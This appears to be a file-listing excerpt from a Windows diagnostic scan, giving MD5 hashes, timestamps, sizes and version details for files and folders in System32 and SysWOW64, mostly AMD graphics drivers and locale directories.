[MD5.7C2A687809EFB472BB6628AD18F640B6] - |A| - [26/02/2016 20:03:10] - (.Copy Right © 2012 Advanced Micro Devices, Inc - TMM Clone Control Module.) - [186.5 Ko] - (6.14.11.25) - C:\Windows\System32\atitmm64.dll
[MD5.AC9CB7F5A83737734D801D3F7360BA11] - |A| - [26/02/2016 21:00:30] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - atiu9pag.dll.) - [117.83 Ko] - (8.14.1.6489) - C:\Windows\System32\atiu9p64.dll
[MD5.5A6B7499BCE10A8805DEDD612AAA2E62] - |A| - [26/02/2016 20:59:38] - (.Copyright (C) 1998-2011 AMD Inc. - atiumd64.dll.) - [10706.54 Ko] - (9.14.10.1171) - C:\Windows\System32\atiumd64.dll
[MD5.FD8284B93B0BC3F816A1D79F6E72AADB] - |A| - [26/02/2016 20:06:42] - (.-.) - [3357.06 Ko] - (0.0.0.0) - C:\Windows\System32\atiumd6a.cap
[MD5.E0F097A143BFFFF7D80D51BD387D6079] - |A| - [26/02/2016 20:59:44] - (.Copyright (c) 2009 Advanced Micro Devices, Inc. - Radeon Video Acceleration Universal Driver.) - [8806.45 Ko] - (8.14.10.533) - C:\Windows\System32\atiumd6a.dll
[MD5.FEAD7354DF8974A7F44964426EE3F0C9] - |A| - [07/11/2014 11:27:49] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - atiuxpag.dll.) - [148.49 Ko] - (8.14.1.6489) - C:\Windows\System32\atiuxp64.dll
[MD5.22A949840539CD1643833BBBE88541DD] - |A| - [15/10/2015 21:08:52] - (.-.) - [98.47 Ko] - (0.0.0.0) - C:\Windows\System32\ativce02.dat
[MD5.CCB513D99293E189D4356DCDC87E83A8] - |A| - [15/10/2015 21:04:34] - (.-.) - [173.19 Ko] - (0.0.0.0) - C:\Windows\System32\ativce03.dat
[MD5.9294CF37EB94C3C16F8546C9E27699A6] - |A| - [22/09/2015 17:28:38] - (.-.) - [228.8 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_cik.dat
[MD5.9DEE2CDA9D0373C3D9DAE2811F913116] - |A| - [22/09/2015 17:27:12] - (.-.) - [227.17 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_cik_nd.dat
[MD5.1E03853D7737219397F9B0EDDC5A18A0] - |A| - [14/10/2015 18:48:54] - (.-.) - [252.41 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_cz_nd.dat
[MD5.CD35635BD1B0990F2B385089A512980D] - |A| - [22/09/2015 19:21:40] - (.-.) - [316 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_el.dat
[MD5.47564018882EA232622F12D17F05209D] - |A| - [22/09/2015 19:19:32] - (.-.) - [313.47 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_el_nd.dat
[MD5.E081588661D5381B23E896206A3FCAA9] - |A| - [14/10/2015 18:46:54] - (.-.) - [246.71 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_FJ.dat
[MD5.ADB3D80A2A80E07D161A4E9B520929FB] - |A| - [14/10/2015 18:44:54] - (.-.) - [243.83 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_FJ_nd.dat
[MD5.AF8CEFF23202EBE23980924A7AFC49BF] - |A| - [14/10/2015 18:50:56] - (.-.) - [255.78 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_stn_nd.dat
[MD5.DE23AA5C964C5246679C49D91C0910CE] - |A| - [22/09/2015 17:38:20] - (.-.) - [315.18 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_vi.dat
[MD5.0AFBDB5DA3011468F8BF5D464D71D552] - |A| - [22/09/2015 17:36:00] - (.-.) - [313.55 Ko] - (0.0.0.0) - C:\Windows\System32\ativvaxy_vi_nd.dat
[MD5.7C163EDE63854539828F5B2C1BC529FD] - |A| - [07/11/2014 11:26:56] - (.-.) - [153.46 Ko] - (0.0.0.0) - C:\Windows\System32\ativvsva.dat
[MD5.219D7091DD1D93728392337FE9C7ADD6] - |A| - [07/11/2014 11:26:56] - (.-.) - [200.15 Ko] - (0.0.0.0) - C:\Windows\System32\ativvsvl.dat
[MD5.5ADEA79E8F723C361EC5139E9F57E2B6] - |A| - [05/08/2013 06:15:06] - (.-.) - [25.04 Ko] - (0.0.0.0) - C:\Windows\System32\bdmjpeg64.dll
[MD5.03BC1E31E802542632E029A402FB01BF] - |A| - [05/08/2013 06:15:12] - (.-.) - [69.05 Ko] - (0.0.0.0) - C:\Windows\System32\bdmpega64.acm
[MD5.509BFBB117E326BD4486B9D355A46C1F] - |A| - [05/08/2013 06:15:08] - (.-.) - [68.55 Ko] - (0.0.0.0) - C:\Windows\System32\bdmpegv64.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [173 Ko] - C:\Windows\System32\bg-BG
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [2589.81 Ko] - C:\Windows\System32\Boot
[MD5.F02F93D5AEC524052E4A37C1BB7CCF31] - |A| - [14/07/2009 01:20:24] - (.Copyright(C)Brother Industries Ltd.1997-2006 - Brother Multi Function CoInstaller.) - [19 Ko] - (1.0.0.20) - C:\Windows\System32\brcoinst.dll
[MD5.7D00FF6A4315FDF4ACAFBB4EF157EA9F] - |A| - [14/07/2009 00:07:04] - (.Copyright (C) 2008 - Gestionnaire de contexte pour réseau personnel Bluetooth.) - [91.5 Ko] - (1.0.0.1) - C:\Windows\System32\BthpanContextHandler.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [51856.11 Ko] - C:\Windows\System32\catroot
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [26892.45 Ko] - C:\Windows\System32\catroot2
[MD5.01C5E7738F7377EC1BC02E10EA8B6E07] - |A| - [26/02/2016 20:48:20] - (.-.) - [229.5 Ko] - (0.0.0.0) - C:\Windows\System32\clinfo.exe
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [5979.97 Ko] - C:\Windows\System32\CodeIntegrity
[MD5.3F2AEE978E9E9C9A33C065821F91C867] - |A| - [26/02/2016 20:11:50] - (.AMD. - CoInstaller DLL.) - [845 Ko] - (1.0.5.9) - C:\Windows\System32\coinst_15.30.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [357 Ko] - C:\Windows\System32\com
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [326455.34 Ko] - C:\Windows\System32\config
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [219.5 Ko] - C:\Windows\System32\cs-CZ
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [216.5 Ko] - C:\Windows\System32\da-DK
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [240.5 Ko] - C:\Windows\System32\de-DE
[MD5.39890FFF0F05FABE97CDFC30ACCD6247] - |A| - [26/02/2016 20:16:24] - (.Advanced Micro Devices. - Delay Audio Processing Object.) - [101 Ko] - (1.0.0.1) - C:\Windows\System32\DelayAPO.dll
[MD5.079B8AEB4A55BF8493BD1EC70285D920] - |ASH| - [14/07/2009 04:57:09] - (.-.) - [0.07 Ko] - (0.0.0.0) - C:\Windows\System32\desktop.ini
[MD5.18D072C521B8F81581AA95B63EE5210C] - |A| - [26/02/2016 20:04:22] - (.-.) - [219 Ko] - (0.0.0.0) - C:\Windows\System32\dgtrayicon.exe
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [5334.5 Ko] - C:\Windows\System32\Dism
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [75902.83 Ko] - C:\Windows\System32\drivers
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [1716236.55 Ko] - C:\Windows\System32\DriverStore
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [240.5 Ko] - C:\Windows\System32\el-GR
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [227.43 Ko] - C:\Windows\System32\en-US
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [230.5 Ko] - C:\Windows\System32\es-ES
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [160.5 Ko] - C:\Windows\System32\et-EE
[MD5.00000000000000000000000000000000] - |D| - [20/01/2017 21:36:43] - [154.5 Ko] - C:\Windows\System32\EventProviders
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [218 Ko] - C:\Windows\System32\fi-FI
[MD5.E9E6477AEC875823E47E8FEFE08B42C1] - |A| - [14/07/2009 04:45:34] - (.-.) - [408.66 Ko] - (0.0.0.0) - C:\Windows\System32\FNTCACHE.DAT
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:06] - [1840 Ko] - C:\Windows\System32\fr
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [41475.89 Ko] - C:\Windows\System32\fr-FR
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 05:32:38] - [0 Ko] - C:\Windows\System32\FxsTmp
[MD5.6E8B98D9726EFB4CDEDC4C802AF27CF6] - |A| - [26/02/2016 20:04:16] - (.-.) - [205 Ko] - (0.0.0.0) - C:\Windows\System32\GameManager64.dll
[MD5.2AE808CB0D9A667B0CF41EA74B3B9BAC] - |A| - [10/06/2009 20:36:24] - (.-.) - [39.6 Ko] - (0.0.0.0) - C:\Windows\System32\gatherNetworkInfo.vbs
[MD5.00000000000000000000000000000000] - |HD| - [14/07/2009 03:20:11] - [4.54 Ko] - C:\Windows\System32\GroupPolicy
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [0 Ko] - C:\Windows\System32\GroupPolicyUsers
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [191.5 Ko] - C:\Windows\System32\he-IL
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [168 Ko] - C:\Windows\System32\hr-HR
[MD5.3C9BB1788ECDC6F1F079D322118C85C7] - |A| - [26/02/2016 19:57:02] - (.-.) - [190.5 Ko] - (0.0.0.0) - C:\Windows\System32\hsa-thunk64.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [221 Ko] - C:\Windows\System32\hu-HU
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [5.36 Ko] - C:\Windows\System32\ias
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [36.27 Ko] - C:\Windows\System32\icsxml
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [36875.94 Ko] - C:\Windows\System32\IME
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [0 Ko] - C:\Windows\System32\inetsrv
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [235 Ko] - C:\Windows\System32\it-IT
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [163 Ko] - C:\Windows\System32\ja-JP
[MD5.9E8BBF72D1635130C0310D7C7BBDBE18] - |A| - [02/01/2009 19:35:54] - (.(c) 2008 - Denis Liégeois (mailto:denis. - Grec - Français version 2009.01.02 Keyboard Layout.) - [7.5 Ko] - (1.0.3.40) - C:\Windows\System32\kbdhefr2.dll
[MD5.FFEC4C12BACC9E0043E207AFDA3F42A8] - |A| - [20/11/2014 21:36:32] - (.-.) - [50 Ko] - (0.0.0.0) - C:\Windows\System32\kdbsdk64.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [162 Ko] - C:\Windows\System32\ko-KR
[MD5.C1B7AB03AC2F3C990A40BC2E18E02CF1] - |A| - [14/07/2009 02:35:50] - (.-.) - [11687.04 Ko] - (0.0.0.0) - C:\Windows\System32\korwbrkr.lex
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [3082.2 Ko] - C:\Windows\System32\LogFiles
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [165 Ko] - C:\Windows\System32\lt-LT
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [166 Ko] - C:\Windows\System32\lv-LV
[MD5.00000000000000000000000000000000] - |D| - [07/11/2014 11:39:45] - [53922.72 Ko] - C:\Windows\System32\Macromed
[MD5.7A495CA1402C2F9F5D035092AD808669] - |A| - [13/07/2009 20:17:48] - (.-.) - [0.85 Ko] - (0.0.0.0) - C:\Windows\System32\manage-bde.wsf
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [1981.88 Ko] - C:\Windows\System32\manifeststore
[MD5.F5496121DA1369AC8255349F86BC43F3] - |A| - [26/02/2016 20:23:00] - (.Copyright (C) 2013 AMD Inc. - Mantle loader.) - [124.5 Ko] - (9.1.10.99) - C:\Windows\System32\mantle64.dll
[MD5.DA987F25C93AAC1592C9EC850ED57D7D] - |A| - [26/02/2016 20:14:12] - (.Copyright (C) 2013 AMD Inc. - Mantle extension library.) - [94 Ko] - (9.1.10.99) - C:\Windows\System32\mantleaxl64.dll
[MD5.00000000000000000000000000000000] - |SD| - [14/07/2009 04:45:42] - [9.21 Ko] - C:\Windows\System32\Microsoft
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [3516.93 Ko] - C:\Windows\System32\migration
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [37792.2 Ko] - C:\Windows\System32\migwiz
[MD5.39E801545FFF6230C80140E0F8A06629] - |A| - [14/07/2009 04:57:09] - (.-.) - [1.21 Ko] - (0.0.0.0) - C:\Windows\System32\migwiz.lnk
[MD5.00000000000000000000000000000000] - |D| - [07/05/2015 11:28:36] - [0 Ko] - C:\Windows\System32\MRT
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [4148.28 Ko] - C:\Windows\System32\Msdtc
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [24.48 Ko] - C:\Windows\System32\MUI
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [212 Ko] - C:\Windows\System32\nb-NO
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [1024 Ko] - C:\Windows\System32\NDF
[MD5.CD48AD912839B9FB6CCA5D4AA9B37500] - |A| - [13/07/2009 22:01:19] - (.-.) - [21.3 Ko] - (0.0.0.0) - C:\Windows\System32\NetTrace.PLA.Diagnostics.xml
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [102 Ko] - C:\Windows\System32\NetworkList
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [229 Ko] - C:\Windows\System32\nl-NL
[MD5.1C96B3DA6ABE5E18B63C64DF75884F6A] - |A| - [14/07/2009 02:35:51] - (.-.) - [1.45 Ko] - (0.0.0.0) - C:\Windows\System32\noise.kor
[MD5.2901049544FDF863362FABA2363EB647] - |A| - [13/07/2009 20:24:21] - (.-.) - [0.82 Ko] - (0.0.0.0) - C:\Windows\System32\onlinesetup.cmd
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [13095.58 Ko] - C:\Windows\System32\oobe
[MD5.5CE136D52C8839EE3AD0848C0F4F6A86] - |A| - [21/11/2014 02:33:06] - (.Copyright (C) 2011 Advanced Micro Devices Inc. - AMD Accelerated Parallel Processing OpenVideo 1.1 Runtime.) - [96.5 Ko] - (10.0.1642.5) - C:\Windows\System32\OpenVideo64.dll
[MD5.8CB8D3376D9324CCCD4FE2B77455EDAF] - |A| - [21/11/2014 02:33:04] - (.Copyright (C) 2011 Advanced Micro Devices Inc. - AMD Accelerated Parallel Processing OVDecode 1.1 Runtime.) - [84.5 Ko] - (10.0.1642.5) - C:\Windows\System32\OVDecode64.dll
[MD5.B0A9E8BAE84E9217CA93A8C75D991258] - |A| - [14/07/2009 02:36:59] - (.-.) - [119.77 Ko] - (0.0.0.0) - C:\Windows\System32\perfc009.dat
[MD5.6D7A3FF6ED1E52486C0D46366109E6CB] - |A| - [14/07/2009 15:24:17] - (.-.) - [147.19 Ko] - (0.0.0.0) - C:\Windows\System32\perfc00C.dat
[MD5.B7795BC96C1CEB86E04E8DC843E9C784] - |A| - [10/06/2009 20:33:35] - (.-.) - [113.56 Ko] - (0.0.0.0) - C:\Windows\System32\PerfCenterCpl.ico
[MD5.7AAA3E23CE4C7845B112F7A79B110E60] - |A| - [14/07/2009 02:36:59] - (.-.) - [30.81 Ko] - (0.0.0.0) - C:\Windows\System32\perfd009.dat
[MD5.07BA000B2E67565BDF112C35171865A5] - |A| - [14/07/2009 15:24:17] - (.-.) - [37.27 Ko] - (0.0.0.0) - C:\Windows\System32\perfd00C.dat
[MD5.02188BC2532BF5AA3DE79CB2BD761CA1] - |A| - [14/07/2009 02:36:59] - (.-.) - [641.44 Ko] - (0.0.0.0) - C:\Windows\System32\perfh009.dat
[MD5.E1BB10EC0D42E4A8AC8FA338211A3384] - |A| - [14/07/2009 15:24:17] - (.-.) - [732.49 Ko] - (0.0.0.0) - C:\Windows\System32\perfh00C.dat
[MD5.4DFBFFBFDC5F1ABC6C3CF852BC756222] - |A| - [14/07/2009 05:13:15] - (.-.) - [1636.73 Ko] - (0.0.0.0) - C:\Windows\System32\PerfStringBackup.INI
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [224 Ko] - C:\Windows\System32\pl-PL
[MD5.E0CC2789C9BDED18253C0FD624840056] - |A| - [14/07/2009 00:40:54] - (.Copyright (C) 2001 - Application PrintBrm.) - [70 Ko] - (1.0.0.0) - C:\Windows\System32\PrintBrmUi.exe
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:06] - [420.42 Ko] - C:\Windows\System32\Printing_Admin_Scripts
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [222.5 Ko] - C:\Windows\System32\pt-BR
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [224 Ko] - C:\Windows\System32\pt-PT
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [23.75 Ko] - C:\Windows\System32\ras
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [0.78 Ko] - C:\Windows\System32\Recovery
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 05:32:38] - [0.07 Ko] - C:\Windows\System32\restore
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [169 Ko] - C:\Windows\System32\ro-RO
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:11] - [219 Ko] - C:\Windows\System32\ru-RU
[MD5.5C18CD22BE4628865FCB63337A6E5EF6] - |A| - [20/01/2017 21:33:00] - (.-.) - [10.18 Ko] - (0.0.0.0) - C:\Windows\System32\ScavengeSpace.xml
[MD5.BF6073C84D818E6FD461E0954DCA33EF] - |A| - [07/11/2014 11:29:05] - (.(c) 2006-2008 Sonic Focus, Inc. - SFFXComm.DLL.) - [65.5 Ko] - (1.0.0.42) - C:\Windows\System32\SFComm64.dll
[MD5.A10CAA1D1E13EE19A35FC7168D578971] - |A| - [07/11/2014 11:29:05] - (.(c) 2006-2009 Sonic Focus, Inc. - SFFXCPBL.DLL.) - [160 Ko] - (1.0.0.43) - C:\Windows\System32\SFCTPL64.dll
[MD5.33BF334F1400DF73DDF94541DC3AC316] - |A| - [07/11/2014 11:29:05] - (.(c) 2006-2008 Sonic Focus, Inc. - SFFXCPStr.DLL.) - [120 Ko] - (1.0.1.42) - C:\Windows\System32\SFFXCPStr.dll
[MD5.85B6F68546A9BAE07F49EEBF54A47580] - |A| - [07/11/2014 11:29:05] - (.(c) 2006-2008 Sonic Focus, Inc. - SFFXProc.DLL.) - [170.5 Ko] - (1.0.0.42) - C:\Windows\System32\SFProc64.dll
[MD5.880F81DF1EDA8459F11057926103CF9A] - |A| - [07/11/2014 11:29:05] - (.(c) 2006-2008 Sonic Focus, Inc. - SFFXSAPO.DLL.) - [77 Ko] - (1.0.0.42) - C:\Windows\System32\SFSAPO64.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [169.5 Ko] - C:\Windows\System32\sk-SK
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [166 Ko] - C:\Windows\System32\sl-SI
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:06] - [42.67 Ko] - C:\Windows\System32\slmgr
[MD5.09929FF07CA76745938944D4CDC3937E] - |A| - [07/11/2014 11:29:05] - (.Copyright (C) Analog Devices, Inc. 2008 - SoundMAX coinstaller (64 bit).) - [40.5 Ko] - (7.0.2.1020) - C:\Windows\System32\SmaxCo.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [22210.02 Ko] - C:\Windows\System32\SMI
[MD5.C74D61FCA22F36791105D7878AF73572] - |A| - [10/06/2009 21:08:17] - (.-.) - [8.09 Ko] - (0.0.0.0) - C:\Windows\System32\spcinstrumentation.man
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [17378 Ko] - C:\Windows\System32\Speech
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [26667.4 Ko] - C:\Windows\System32\spool
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [2130.52 Ko] - C:\Windows\System32\spp
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [30.19 Ko] - C:\Windows\System32\sppui
[MD5.00000000000000000000000000000000] - |D| - [20/01/2017 21:46:41] - [1775.5 Ko] - C:\Windows\System32\SPReview
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [170 Ko] - C:\Windows\System32\sr-Latn-CS
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [216.5 Ko] - C:\Windows\System32\sv-SE
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [137.88 Ko] - C:\Windows\System32\sysprep
[MD5.5EC92F0EAE3CA59F647C3CA5AA7CB053] - |A| - [20/01/2017 21:34:42] - (.-.) - [339.75 Ko] - (0.0.0.0) - C:\Windows\System32\systemsf.ebd
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [333.98 Ko] - C:\Windows\System32\Tasks
[MD5.47F22CAD4A16BB40153555D631546B94] - |A| - [10/06/2009 21:01:25] - (.-.) - [58.71 Ko] - (0.0.0.0) - C:\Windows\System32\tcpmon.ini
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [157 Ko] - C:\Windows\System32\th-TH
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [212.5 Ko] - C:\Windows\System32\tr-TR
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:13] - [166.5 Ko] - C:\Windows\System32\uk-UA
[MD5.B0D8E26D3CC725F0CC6D33FDBEA061F7] - |A| - [14/07/2009 04:45:37] - (.-.) - [21 Ko] - (0.0.0.0) - C:\Windows\System32\umstartup.etl
[MD5.E2090ABBDE0128166584C1534810D334] - |A| - [14/07/2009 04:45:37] - (.-.) - [9 Ko] - (0.0.0.0) - C:\Windows\System32\umstartup000.etl
[MD5.00000000000000000000000000000000] - |D| - [21/01/2017 14:26:18] - [1754.83 Ko] - C:\Windows\System32\Wat
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [53727.92 Ko] - C:\Windows\System32\wbem
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:06] - [47.61 Ko] - C:\Windows\System32\WCN
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [41967.73 Ko] - C:\Windows\System32\wdi
[MD5.6EDD021A8B6457DDE09DE7B7FA4E8C8B] - |A| - [13/07/2009 21:54:15] - (.-.) - [0.6 Ko] - (0.0.0.0) - C:\Windows\System32\WdsUnattendTemplate.xml
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [48 Ko] - C:\Windows\System32\wfp
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 05:32:38] - [0 Ko] - C:\Windows\System32\WinBioDatabase
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 05:32:38] - [73.5 Ko] - C:\Windows\System32\WinBioPlugIns
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 05:32:38] - [9207.93 Ko] - C:\Windows\System32\WindowsPowerShell
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [113404 Ko] - C:\Windows\System32\winevt
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:07] - [106.26 Ko] - C:\Windows\System32\winrm
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [141.5 Ko] - C:\Windows\System32\zh-CN
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [63 Ko] - C:\Windows\System32\zh-HK
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [141.5 Ko] - C:\Windows\System32\zh-TW
[MD5.00000000000000000000000000000000] - |D| - [26/03/2016 07:38:54] - [1645.02 Ko] - C:\Windows\SysWOW64\.launcher_log
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:07] - [0 Ko] - C:\Windows\SysWOW64\040C
[MD5.FA4C74DA339223CF192EF52ADA1758EC] - |A| - [17/03/2016 14:10:32] - (.-.) - [0.07 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\123.html
[MD5.00000000000000000000000000000000] - |D| - [07/05/2015 08:50:26] - [0 Ko] - C:\Windows\SysWOW64\3DMGAME
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [2258.5 Ko] - C:\Windows\SysWOW64\AdvancedInstallers
[MD5.5C313E34DD2C11BE923C2C325CD1248B] - |A| - [26/02/2016 20:04:02] - (.-.) - [185.5 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\amdgfxinfo32.dll
[MD5.BC95B9EFB9A656F6B02FE7626E1B8650] - |A| - [26/02/2016 20:23:14] - (.Advanced Micro Devices, Inc. Copyright (C) 2015 - LiquidVR SDK 1.0.) - [561 Ko] - (1.0.4.2) - C:\Windows\SysWOW64\amdlvr32.dll
[MD5.A8D757F8D78FC86DAADD980F289F73B6] - |A| - [26/02/2016 20:18:02] - (.Copyright (C) 2013 AMD Inc. - Mantle driver, support for SI family and above.) - [5101.5 Ko] - (9.1.10.99) - C:\Windows\SysWOW64\amdmantle32.dll
[MD5.696FC77A219F8F71C9E2916B93B1ADAB] - |A| - [26/02/2016 20:08:30] - (.Copyright (c) 2013 Advanced Micro Devices, Inc. - Radeon MMOCL Universal Driver.) - [38.5 Ko] - (1.6.0.0) - C:\Windows\SysWOW64\amdmmcl.dll
[MD5.D74A0BA826558B32AEAC5DC16A1D21D7] - |A| - [26/02/2016 20:47:02] - (.Copyright (C) 2011 Advanced Micro Devices Inc. - AMD Accelerated Parallel Processing OpenCL 2.0 Runtime.) - [40537.5 Ko] - (10.0.1912.5) - C:\Windows\SysWOW64\amdocl.dll
[MD5.F722251A5BC18F4964A1DEDDB590A222] - |A| - [26/02/2016 20:44:20] - (.Copyright (C) 2011 Advanced Micro Devices Inc. - AMD COMPILER OpenCL 1.1 Compiler.) - [21824.5 Ko] - (0.8.0.0) - C:\Windows\SysWOW64\amdocl12cl.dll
[MD5.56B986D13C74903FE27B71BA85C76037] - |A| - [07/11/2014 11:26:40] - (.-.) - [972.01 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\amdocl_as32.exe
[MD5.28F4F5BAC73505F71B8AEC95B7FBE1DD] - |A| - [07/11/2014 11:26:40] - (.-.) - [780.01 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\amdocl_ld32.exe
[MD5.76EF2CF17B1B85EECE6A8F3CB2A50C7F] - |A| - [26/02/2016 21:00:46] - (.Copyright (c) 2009 Advanced Micro Devices, Inc. - Radeon PCOM Universal Driver.) - [70.02 Ko] - (8.14.10.23) - C:\Windows\SysWOW64\amdpcom32.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [201.5 Ko] - C:\Windows\SysWOW64\ar-SA
[MD5.A4B4FE50CCA23B38688003EA85A30EF6] - |A| - [07/11/2014 11:59:20] - (.Copyright (c) 2012 AVAST Software - avast! start-up scanner.) - [222.31 Ko] - (7.0.1474.765) - C:\Windows\SysWOW64\aswBoot.exe
[MD5.B08D5B1B77FE48075D94650EA3DF8E6C] - |A| - [26/02/2016 19:58:38] - (.Copyright (C) 2008-2015 Advanced Micro Devices, Inc. - ADL.) - [919.5 Ko] - (7.16.10.1301) - C:\Windows\SysWOW64\atiadlxx.dll
[MD5.B08D5B1B77FE48075D94650EA3DF8E6C] - |A| - [26/02/2016 19:58:38] - (.Copyright (C) 2008-2015 Advanced Micro Devices, Inc. - ADL.) - [919.5 Ko] - (7.16.10.1301) - C:\Windows\SysWOW64\atiadlxy.dll
[MD5.0E73887903642A98928DA4749B9E22FD] - |A| - [26/02/2016 20:11:18] - (.-.) - [670.13 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\atiapfxx.blb
[MD5.8F990D6C8A64D1F9D32C6B0B76689F84] - |A| - [26/02/2016 20:10:50] - (.Copyright (C) 2008 Advanced Micro Devices Inc. - ATI CAL compiler runtime.) - [48 Ko] - (6.14.10.1848) - C:\Windows\SysWOW64\aticalcl.dll
[MD5.B6D9A2FA2B44A99EC43AC38A98480AF7] - |A| - [26/02/2016 20:09:42] - (.Copyright (C) 2008 Advanced Micro Devices Inc. - ATI CAL DD.) - [13967 Ko] - (6.14.10.1848) - C:\Windows\SysWOW64\aticaldd.dll
